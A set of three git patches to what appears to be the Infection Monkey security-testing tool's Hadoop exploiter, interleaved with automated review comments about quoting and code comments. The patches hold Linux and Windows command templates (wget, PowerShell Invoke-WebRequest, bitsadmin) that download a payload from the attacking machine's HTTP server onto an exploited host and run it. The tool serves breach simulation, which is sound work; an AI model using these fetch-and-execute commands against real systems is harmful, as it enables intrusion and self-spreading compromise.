From 5ffd22433aec5ae96450b4955d1275a23613808b Mon Sep 17 00:00:00 2001
From: VakarisZ
Date: Wed, 21 Nov 2018 13:32:45 +0200
Subject: [PATCH 1/3] Hadoop windows fixed to be more reliable
---
monkey/infection_monkey/exploit/hadoop.py | 12 ++++++++++++
1 file changed, 12 insertions(+)
diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py
index 0605614ee..6c0180fb0 100644
--- a/monkey/infection_monkey/exploit/hadoop.py
+++ b/monkey/infection_monkey/exploit/hadoop.py
@@ -29,9 +29,18 @@ class HadoopExploiter(WebRCE):
"&& wget -O %(monkey_path)s %(http_path)s " \
"; chmod +x %(monkey_path)s " \
"&& %(monkey_path)s %(monkey_type)s %(parameters)s"
+
+ """ Command was observed to be unreliable, we use powershell instead
WINDOWS_COMMAND = "cmd /c if NOT exist %(monkey_path)s bitsadmin /transfer" \
" Update /download /priority high %(http_path)s %(monkey_path)s " \
"& %(monkey_path)s %(monkey_type)s %(parameters)s"
+ """
+
+ WINDOWS_COMMAND = "powershell -NoLogo -Command \"if (!(Test-Path '%(monkey_path)s')) { " \
"Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing }; " \
" if (! (ps | ? {$_.path -eq '%(monkey_path)s'})) " \
"{& %(monkey_path)s %(monkey_type)s %(parameters)s } \""
+
# How long we have our http server open for downloads in seconds
DOWNLOAD_TIMEOUT = 60
# Random string's length that's used for creating unique app name
@@ -46,6 +55,9 @@ class HadoopExploiter(WebRCE):
self.add_vulnerable_urls(urls, True)
if not self.vulnerable_urls:
return False
+ # We can only upload 64bit version to windows for various reasons
+ if self.host.os['type'] == 'windows':
+ self.host.os['machine'] = '64'
paths = self.get_monkey_paths()
if not paths:
return False
From b48cb16088d4191e776ed8911f8374ac9d545a94 Mon Sep 17 00:00:00 2001
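Review bot: The new WINDOWS_COMMAND embeds `%(monkey_path)s` and `%(http_path)s` inside single-quoted PowerShell string literals with no escaping, so any value containing `'` breaks the command instead of being quoted, and `%(parameters)s` is spliced unquoted into the `-Command "..."` body as well. Both values appear to be generated by the exploiter itself (get_monkey_paths and the HTTPTools server) rather than read from the target, so this is a robustness rather than an injection concern, but the assumption should be written down next to the constant, e.g. `# monkey_path and http_path are placed in single-quoted PowerShell literals and must not contain a quote character`. The `ps | ? {$_.path -eq ...}` guard also has no comment saying why it exists, while LINUX_COMMAND above carries the multi-node rationale; the same one-line note belongs here. The class definition this hunk belongs to starts outside the hunk.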
From: VakarisZ
Date: Thu, 22 Nov 2018 19:45:13 +0200
Subject: [PATCH 2/3] Comment changed
---
monkey/infection_monkey/exploit/hadoop.py | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py
index 6c0180fb0..30925bc0f 100644
--- a/monkey/infection_monkey/exploit/hadoop.py
+++ b/monkey/infection_monkey/exploit/hadoop.py
@@ -55,7 +55,7 @@ class HadoopExploiter(WebRCE):
self.add_vulnerable_urls(urls, True)
if not self.vulnerable_urls:
return False
- # We can only upload 64bit version to windows for various reasons
+ # We assume hadoop is ran only on 64 bit windows
if self.host.os['type'] == 'windows':
self.host.os['machine'] = '64'
paths = self.get_monkey_paths()
From db5e5eb45339b4c408da1c9a40b310c9c3f5aa75 Mon Sep 17 00:00:00 2001
From: VakarisZ
Date: Thu, 29 Nov 2018 17:43:09 +0200
Subject: [PATCH 3/3] Commands moved to model
---
monkey/infection_monkey/exploit/hadoop.py | 28 +++--------------------
monkey/infection_monkey/model/__init__.py | 12 +++++++++-
2 files changed, 14 insertions(+), 26 deletions(-)
diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py
index 30925bc0f..881ccf39d 100644
--- a/monkey/infection_monkey/exploit/hadoop.py
+++ b/monkey/infection_monkey/exploit/hadoop.py
@@ -12,7 +12,7 @@ import posixpath
from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.exploit.tools import HTTPTools, build_monkey_commandline, get_monkey_depth
-from infection_monkey.model import MONKEY_ARG, ID_STRING
+from infection_monkey.model import MONKEY_ARG, ID_STRING, HADOOP_WINDOWS_COMMAND, HADOOP_LINUX_COMMAND
__author__ = 'VakarisZ'
@@ -22,25 +22,6 @@ LOG = logging.getLogger(__name__)
class HadoopExploiter(WebRCE):
_TARGET_OS_TYPE = ['linux', 'windows']
HADOOP_PORTS = [["8088", False]]
-
- # We need to prevent from downloading if monkey already exists because hadoop uses multiple threads/nodes
- # to download monkey at the same time
- LINUX_COMMAND = "! [ -f %(monkey_path)s ] " \
- "&& wget -O %(monkey_path)s %(http_path)s " \
- "; chmod +x %(monkey_path)s " \
- "&& %(monkey_path)s %(monkey_type)s %(parameters)s"
-
- """ Command was observed to be unreliable, we use powershell instead
- WINDOWS_COMMAND = "cmd /c if NOT exist %(monkey_path)s bitsadmin /transfer" \
- " Update /download /priority high %(http_path)s %(monkey_path)s " \
- "& %(monkey_path)s %(monkey_type)s %(parameters)s"
- """
-
- WINDOWS_COMMAND = "powershell -NoLogo -Command \"if (!(Test-Path '%(monkey_path)s')) { " \
- "Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing }; " \
- " if (! (ps | ? {$_.path -eq '%(monkey_path)s'})) " \
- "{& %(monkey_path)s %(monkey_type)s %(parameters)s } \""
-
# How long we have our http server open for downloads in seconds
DOWNLOAD_TIMEOUT = 60
# Random string's length that's used for creating unique app name
@@ -55,9 +36,6 @@ class HadoopExploiter(WebRCE):
self.add_vulnerable_urls(urls, True)
if not self.vulnerable_urls:
return False
- # We assume hadoop is ran only on 64 bit windows
- if self.host.os['type'] == 'windows':
- self.host.os['machine'] = '64'
paths = self.get_monkey_paths()
if not paths:
return False
@@ -91,9 +69,9 @@ class HadoopExploiter(WebRCE):
# Build command to execute
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1)
if 'linux' in self.host.os['type']:
- base_command = self.LINUX_COMMAND
+ base_command = HADOOP_LINUX_COMMAND
else:
- base_command = self.WINDOWS_COMMAND
+ base_command = HADOOP_WINDOWS_COMMAND
return base_command % {"monkey_path": path, "http_path": http_path, "monkey_type": MONKEY_ARG, "parameters": monkey_cmd}
diff --git a/monkey/infection_monkey/model/__init__.py b/monkey/infection_monkey/model/__init__.py
index f2217623a..35a63f2a2 100644
--- a/monkey/infection_monkey/model/__init__.py
+++ b/monkey/infection_monkey/model/__init__.py
@@ -28,4 +28,14 @@ CHECK_COMMAND = "echo %s" % ID_STRING
GET_ARCH_WINDOWS = "wmic os get osarchitecture"
GET_ARCH_LINUX = "lscpu"
-DOWNLOAD_TIMEOUT = 300
\ No newline at end of file
+# All in one commands (upload, change permissions, run)
+HADOOP_WINDOWS_COMMAND = "powershell -NoLogo -Command \"if (!(Test-Path '%(monkey_path)s')) { " \
+ "Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing }; " \
+ " if (! (ps | ? {$_.path -eq '%(monkey_path)s'})) " \
+ "{& %(monkey_path)s %(monkey_type)s %(parameters)s } \""
+HADOOP_LINUX_COMMAND = "! [ -f %(monkey_path)s ] " \
+ "&& wget -O %(monkey_path)s %(http_path)s " \
+ "; chmod +x %(monkey_path)s " \
+ "&& %(monkey_path)s %(monkey_type)s %(parameters)s"
+
+DOWNLOAD_TIMEOUT = 300
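Review bot: The comment added above HADOOP_WINDOWS_COMMAND, `All in one commands (upload, change permissions, run)`, does not describe the Windows template, which downloads and runs but has no permission step; only HADOOP_LINUX_COMMAND carries `chmod +x`. Now that both templates live in the model module away from their only caller in hadoop.py, the `%`-format keys they require are no longer visible beside them and a missing key would surface only as a KeyError at format time, so a comment listing them is worth adding, e.g. `# %-format templates; the caller in hadoop.py supplies monkey_path, http_path, monkey_type and parameters`. The rationale for the exists-check guards (the class-level comment removed in this commit said several Hadoop threads/nodes may run the download at the same time) is not reproduced here and should move along with the strings.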